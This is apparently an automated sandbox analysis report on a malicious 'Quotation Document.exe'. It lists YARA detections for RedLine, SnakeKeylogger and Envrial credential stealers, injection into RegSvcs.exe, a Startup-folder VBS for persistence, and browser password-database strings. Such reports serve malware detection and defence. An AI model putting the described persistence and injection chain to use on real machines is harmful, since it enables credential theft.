                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00408C607_2_00408C60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_004182447_2_00418244
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_004016507_2_00401650
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00402F207_2_00402F20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_004193C47_2_004193C4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_004187887_2_00418788
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00402F897_2_00402F89
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00402B907_2_00402B90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_004073A07_2_004073A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_029314437_2_02931443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_029314487_2_02931448
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_029311A47_2_029311A4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_029311A87_2_029311A8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_050FBF207_2_050FBF20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_050F46487_2_050F4648
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_050FB8507_2_050FB850
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_050F73307_2_050F7330
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_050FF4E47_2_050FF4E4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_050FF4F07_2_050FF4F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_050F463A7_2_050F463A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_050FAEA87_2_050FAEA8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_050FF93B7_2_050FF93B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_050FF9487_2_050FF948
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_050FF08B7_2_050FF08B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_050FF0987_2_050FF098
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_050F73217_2_050F7321
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_050F83EB7_2_050F83EB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_064D9F097_2_064D9F09
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_064D34307_2_064D3430
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_064D14BC7_2_064D14BC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 0040E1D8 appears 43 times
                Source: Quotation Document.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                Source: 7.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                Source: 7.2.RegSvcs.exe.2ba0000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 7.2.RegSvcs.exe.3c55570.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 7.2.RegSvcs.exe.3c55570.6.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 7.2.RegSvcs.exe.2ba0000.4.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 7.2.RegSvcs.exe.2830bfe.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 7.2.RegSvcs.exe.2830bfe.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 7.2.RegSvcs.exe.2830bfe.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 7.2.RegSvcs.exe.3c7e790.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 7.2.RegSvcs.exe.2830bfe.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 7.2.RegSvcs.exe.3c7e790.5.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 7.2.RegSvcs.exe.3c56458.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 7.2.RegSvcs.exe.3c56458.7.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 7.2.RegSvcs.exe.2831ae6.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 7.2.RegSvcs.exe.2831ae6.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 7.2.RegSvcs.exe.2831ae6.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 7.2.RegSvcs.exe.5090000.8.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 7.2.RegSvcs.exe.2ba0ee8.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 7.2.RegSvcs.exe.2ba0ee8.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 7.2.RegSvcs.exe.3c55570.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 7.2.RegSvcs.exe.5090000.8.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 7.2.RegSvcs.exe.2831ae6.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 7.2.RegSvcs.exe.3c7e790.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 7.2.RegSvcs.exe.3c7e790.5.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 7.2.RegSvcs.exe.5090000.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 7.2.RegSvcs.exe.2ba0ee8.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 7.2.RegSvcs.exe.3c55570.6.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 7.2.RegSvcs.exe.2ba0ee8.3.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 7.2.RegSvcs.exe.2ba0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 7.2.RegSvcs.exe.5090000.8.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 7.2.RegSvcs.exe.2ba0000.4.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 7.2.RegSvcs.exe.3c56458.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 7.2.RegSvcs.exe.3c56458.7.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 00000007.00000002.2900256489.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                Source: 00000007.00000002.2901951538.00000000027F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000007.00000002.2902379398.0000000002BA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000007.00000002.2902379398.0000000002BA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 00000007.00000002.2905371247.0000000005090000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000007.00000002.2905371247.0000000005090000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 00000007.00000002.2905033906.0000000003C51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: RegSvcs.exe PID: 8080, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 7.2.RegSvcs.exe.2831ae6.2.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                Source: 7.2.RegSvcs.exe.2831ae6.2.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                Source: 7.2.RegSvcs.exe.3c7e790.5.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                Source: 7.2.RegSvcs.exe.3c7e790.5.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                Source: 7.2.RegSvcs.exe.2ba0ee8.3.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                Source: 7.2.RegSvcs.exe.2ba0ee8.3.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                Source: 7.2.RegSvcs.exe.3c56458.7.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                Source: 7.2.RegSvcs.exe.3c56458.7.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                Source: 7.2.RegSvcs.exe.5090000.8.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                Source: 7.2.RegSvcs.exe.5090000.8.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                Source: 7.2.RegSvcs.exe.5090000.8.raw.unpack, UltraSpeed.csCryptographic APIs: 'TransformFinalBlock'
                Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@8/3@3/3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,7_2_004019F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,7_2_004019F0
                Source: C:\Users\user\Desktop\Quotation Document.exeFile created: C:\Users\user\AppData\Local\embowelingJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: NULL
                Source: C:\Users\user\Desktop\Quotation Document.exeFile created: C:\Users\user\AppData\Local\Temp\bohmiteJump to behavior
                Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\neophobia.vbs"
                Source: Quotation Document.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\Quotation Document.exeFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\Quotation Document.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: RegSvcs.exe, 00000007.00000002.2903015296.0000000002D9C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2903015296.0000000002DBA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2903015296.0000000002DAB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: Quotation Document.exeReversingLabs: Detection: 65%
                Source: C:\Users\user\Desktop\Quotation Document.exeFile read: C:\Users\user\Desktop\Quotation Document.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\Quotation Document.exe "C:\Users\user\Desktop\Quotation Document.exe"
                Source: C:\Users\user\Desktop\Quotation Document.exeProcess created: C:\Users\user\AppData\Local\emboweling\neophobia.exe "C:\Users\user\Desktop\Quotation Document.exe"
                Source: C:\Users\user\AppData\Local\emboweling\neophobia.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\Quotation Document.exe"
